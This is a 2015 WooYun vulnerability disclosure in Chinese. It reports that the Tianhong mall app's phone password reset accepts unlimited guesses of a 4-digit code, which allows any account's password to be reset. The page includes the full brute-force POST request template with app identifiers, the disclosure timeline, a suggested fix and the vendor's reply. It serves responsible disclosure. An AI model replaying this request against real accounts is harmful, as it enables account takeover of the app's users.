当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147101

漏洞标题:天虹商场虹领巾APP任意用户密码重置

相关厂商:天虹商场

漏洞作者: 专业种田

提交时间:2015-10-16 09:58

修复时间:2015-12-04 15:32

公开时间:2015-12-04 15:32

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-16: 细节已通知厂商并且等待厂商处理中
2015-10-20: 厂商已经确认,细节仅向厂商公开
2015-10-30: 细节向核心白帽子及相关领域专家公开
2015-11-09: 细节向普通白帽子公开
2015-11-19: 细节向实习白帽子公开
2015-12-04: 细节向公众公开

简要描述:

RT

详细说明:

虹领巾APP软件 ,通过手机找回密码功能,验证码为4位,而且没有失败次数限制,2分钟内即可破解出一个手机的验证码。

tianhong100.png


tianhong101.png

漏洞证明:

2个手机号测试,都在2分钟内跑完9999次,成功修改密码。

tianhong102.png

tianhong103.png

tianhong104.png


POST /center/member/forget HTTP/1.1
x-http-interface-v: 1.0.0
x-http-time: 2015-10-16 08:55:05
x-http-package: cn.rainbow.westore
x-http-devicetype: android
x-http-version: 1.1.6
x-http-deviceuid: ffffffff-a95e-e042-5fcb-c4e600000000
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.1; MI 2 MIUI/4.12.5)
Host: center.rainbowscarf.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 158
captcha=§1234§&secret=87dae0d9c85b4d17688290320ccb87a2313d2596ad61125cb8160f6d9d598f85&appid=87961cc3355f2364e3b0796f07bf54b7&phone=手机号&new_pwd=密码&

修复方案:

验证码失败3次重新获取。

版权声明:转载请注明来源 专业种田@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-10-20 15:30

厂商回复:

感谢提交!

最新状态:

暂无